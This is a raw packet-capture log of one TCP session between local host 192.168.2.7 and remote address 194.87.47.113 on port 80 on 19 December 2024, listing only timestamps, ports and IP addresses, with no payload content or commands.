Dec 19, 2024 08:47:22.368160009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.369776011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.370033979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.370085955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.371522903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.371733904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.371803045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.373400927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.373521090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.373666048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.375660896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.376311064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.376421928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.378102064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.378114939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.378233910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.380235910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.380249023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.380337000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.380713940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.381063938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.381160021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.383189917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.383203983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.383280993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.384407043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.384419918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.384556055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.386049986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.386234999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.386357069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.387852907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.413494110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.413537979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.413760900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.414315939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.414331913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.414658070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.416292906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.416306973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.416352034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.417773962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.417893887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.417958021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.419543982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.419610977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.419704914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.466036081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.502019882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.502036095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.502187967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.503458023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.503464937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.503628969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.505521059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.505534887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.505600929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.505923033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.506283045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.506371021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.507137060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.507148981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.507193089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.508598089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.508781910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.508902073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.510075092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.510087013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.510133982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.511503935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.512975931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.512988091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.513034105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.513300896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.513385057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.514431000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.515863895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.515876055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.515993118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.516201019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.516252995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.517256021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.517800093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.517853975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.518717051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.520190954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.520204067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.520240068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.520677090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.520731926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.521681070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.522106886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.522162914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.523147106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.523159981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.523268938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.524576902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.524730921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.524779081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.526676893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.526681900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.526750088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.528103113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.528117895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.528182030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.530167103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.530180931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.530262947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.532308102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.532321930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.532449961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.533713102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.533715010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.533750057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.536052942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.536072969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.536096096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.536228895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.542159081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.542218924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.542397976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.542793989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.542838097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.544069052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.544364929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.544377089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.544456005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.545722961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.545780897 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.545926094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.548039913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.548111916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.548710108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.549314976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.549328089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.549422026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.550082922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.550159931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.550393105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.551558971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.551693916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.551714897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.553062916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.553133965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.554455042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.554565907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.554579020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.554650068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.555881977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.556032896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.557265043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.557476997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.557491064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.557566881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.558919907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.558932066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.558986902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.560208082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.560278893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.560437918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.561603069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.561682940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.561832905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.565547943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.565615892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.566293001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.566307068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.566390038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.567105055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.567117929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.567128897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.567148924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.569817066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.569830894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.569916964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.571377993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.571379900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.571482897 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.572928905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.572984934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.573678970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.574476004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.574557066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.575243950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.576025963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.576039076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.576133966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.577583075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.577706099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.578330994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.579093933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.579106092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.579135895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.579906940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.579921007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.579991102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.580663919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.580677986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.580727100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.605420113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.605503082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.605592966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.606153011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.606252909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.606357098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.607579947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.607647896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.607736111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.608994961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.609071016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.693839073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.693985939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.694123983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.694422007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.694725990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.694782019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.695595026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.695915937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.695974112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.697098017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.697341919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.697385073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.743248940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.743545055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.743604898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.743813992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.744474888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.744549990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.745105028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.745474100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.745699883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.745913982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.746145010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.746220112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.747047901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.747270107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.747347116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.748135090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.748310089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.748359919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.749216080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.749449015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.749494076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.750581980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.750596046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.750649929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.751421928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.751800060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.751841068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.752513885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.752825022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.752913952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.753628969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.753817081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.753870010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.754746914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.754950047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.755048037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.755831957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.756057024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.756119013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.756917953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.757467031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.757586002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.758028984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.758265972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.758347988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.759213924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.759419918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.759475946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.760236979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.760469913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.760535955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.761353970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.761547089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.761604071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.762460947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.762841940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.762909889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.763523102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.763962030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.764014006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.764702082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.764890909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.764966965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.765736103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.766072035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.766299963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.766881943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.767075062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.767138004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.767931938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.768486023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.768609047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.769047022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.769248962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.769300938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.770159006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.770787954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.770845890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.771250963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.771435022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.771502018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.772378922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.772707939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.772871971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.773477077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.773664951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.773747921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.775527954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.778444052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.778456926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.778467894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.778481960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.778495073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.778505087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.778527021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.778552055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.790258884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.790317059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.790390968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.790606976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.790894032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.790970087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.791152000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.791899920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.792021990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.889962912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.890110016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.890166998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.890431881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.934654951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.959273100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.959428072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.959487915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.959868908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.960038900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.960165024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.960362911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.961133003 CET	80	49707	194.87.47.113	192.168.2.7
